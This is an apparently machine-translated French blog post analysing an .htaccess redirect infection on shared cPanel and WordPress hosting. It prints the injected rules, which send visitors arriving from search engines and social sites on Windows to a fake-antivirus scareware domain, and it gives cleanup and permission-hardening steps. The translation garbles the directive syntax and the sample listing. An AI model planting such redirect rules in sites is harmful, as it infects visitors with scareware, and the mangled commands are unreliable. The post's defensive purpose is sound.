Malware / Virus - .htaccess "réécrire" et rediriger

Une nouvelle forme de virus que je vois pas savoir beaucoup affecter les sites hébergés sur serveurs non sécurisés où les comptes d'utilisateurs / sous-comptes peuvent «voir» les uns des autres. Plus précisément, tous les comptes d'hébergement sont mis dans le dossier "vhosts"Et le droit de l'écriture dossier utilisateur les "vhosts" est donné un général ... revendeur utilisateur dans la plupart des situations. Il est une méthode typique n'utilise des serveurs Web WHM / cPanel.

L'action .htaccess virus - .htaccess Hack

virus affecte les fichiers .htaccess Site de la victime. Les lignes sont ajoutées / directive à rediriger les visiteurs (Venant de yahoo, msn, google, facebook, yaindex, twitter, myspace, etc et les portails des sites à fort trafic) pour quelques sites qui offrent "antivirus". Il est solutions de faux antivirusA propos de qui je l'ai écrit dans l'introduction .

Voici ce qu'il ressemble à un .htaccess affectés (pas accéder aux URL des lignes de contenu ci-dessous)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
% RewriteCond {HTTP_REFERER}. * Vivre. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * EBay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Linkedin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Doubleclick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
% RewriteCond {HTTP_REFERER}. * Demandez. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Recherche. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Metacrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. * Windows *.
. RewriteRule * hxxp: //wwww.peoriavascularsurgery.com/main.php H =% {} & i = HTTP_HOST J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

REQUEST_FILENAME RewriteCond% {}! -f
REQUEST_FILENAME RewriteCond% {}! -d
REQUEST_FILENAME RewriteCond% {} !. * Jpg $ |. * Gif $ |. * .png $
RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule * hxxp:.? //wwww.peoriavascularsurgery.com/main.php H =% {} & i = HTTP_HOST J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Ceux qui utilisent WordPress trouverez ces lignes dans le fichier .htaccess à partir de public_html. De plus, le virus crée un dossier .htaccess identique wp-content.

*Il y a aussi des situations dans lesquelles apparaît à la place peoriavascularsurgery.com dns.thesoulfoodcafe.com ou d'autres adresses.

Ce qui rend ce virus.

Une fois redirigé, le visiteur est accueilli à bras ouverts par le message:

Attention!
Votre ordinateur contient des signes différents de virus et de logiciels malveillants programmes présence. Votre système anti-virus requiert une vérification immédiate!
Système de sécurité va effectuer un balayage rapide et gratuit de votre PC pour les virus et les programmes malveillants.

1 malware

Peu importe quel bouton vous appuyez sur, vous êtes redirigé vers la page "Poste de travail"Conçu pour imiter conception XP. Cela démarre automatiquement "balayage" à la fin de laquelle nous découvrons que nous sommes "infectés".

2 malware

Après avoir cliqué sur OK ou sur Annuler, va commencer Téléchargerfichier acquis setup.exe. cette setup.exe est faux anti-virus affectant le système. Installez des logiciels malveillants de se propager d'autres liens compromis, et d'ailleurs ceux-ci un logiciel anti-virus (Tout faux) que la victime est invitée à acheter.
Ceux qui ont déjà pris contact avec le virus peut utiliser ce formulaire . Il est également recommandé de scanner le disque dur entier. recommander Kaspersky Internet Security ou Kaspersky Anti-Virus.

Ce type de virus affecte les systèmes d'exploitation Visiteurs systèmes d'exploitation Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 et Windows 95. À ce jour, il n'existe pas de cas connus d'infection de la Vista Systèmes d'exploitation Windows et Windows 7.

Comment pouvons-nous supprimer ce .htaccess virus sur le serveur, et la façon de prévenir l'infection.

1. L'analyse des fichiers suspects et l'effacement des codes. Pour veiller à ce que le fichier non seulement affecté .htaccess Il est préférable analyser l'ensemble de fichiers .php si js.

2. Réécrire eux et définir le fichier .htaccess chmod 644 ou 744 inscriptible seulement propriétaire du site de l'utilisateur.

3. Lorsque vous créez un compte d'hébergement pour un dossier de site / home ou / webroot Cela va créer automatiquement un dossier qui a le plus souvent le nom d'utilisateur (utilisateur pour cPanel, FTP, Etc.). Pour empêcher l'écriture des données et la transmission des virus d'un utilisateur à un autre, il est indiqué que chaque dossier d'utilisateur à définir:

chmod 644 ou 744, 755 - 644 est indiqué.
chown -R nume_user nume_folder.
chgrp -R nume_user nume_folder

ls -toutes de vérifier les modes ont été mis à droite. Il devrait apparaître quelque chose comme ceci:

drwx-x-x 12 4096 mai 6 14 Dynamics Dynamics: Dynamics 51 /
drwx-x-x 10 4096 Duran Duran Mars 7 07: 46 Duran /
drwx-x-x 12 4096 Jan tubes tubes 29 11: tubes 23 /
drwxr-xr-x 14 4096 Février 26 2009 Express Express express /
drwxr-xr-x 9 4096 mai 19 01 ezo ezo: 09 ezo /
drwx-x-x 9 4096 pharma pharma Décembre 19 22: 29 pharma /

Si l'un des ci-dessus userele FTP Les fichiers infectésIl ne peut pas envoyer le virus hébergé par un autre utilisateur. Il est un filet de sécurité minimal pour protéger les comptes hébergés sur un serveur web.

Les éléments communs des zones touchées par ce type de virus.

Toutes les zones touchées rediriger les visiteurs vers des sites par nom de domaine contenant "/».

le "virus .htaccess"Affecte toute CMS (Joomla, WordPress, phpBB, Etc.) qui utilise .htaccess.

.htaccess Redirect Virus Hack &.

Malware / Virus - .htaccess "réécrire" et rediriger

A propos de l'auteur

furtif LP

Fondateur et rédacteur InvisibilitéDate 2006.
Expérience sur les systèmes d'exploitation Linux (CentOS) en particulier, Mac OS X, Windows XP> Fenêtres 10 et WordPress (CMS).

Laisser un commentaire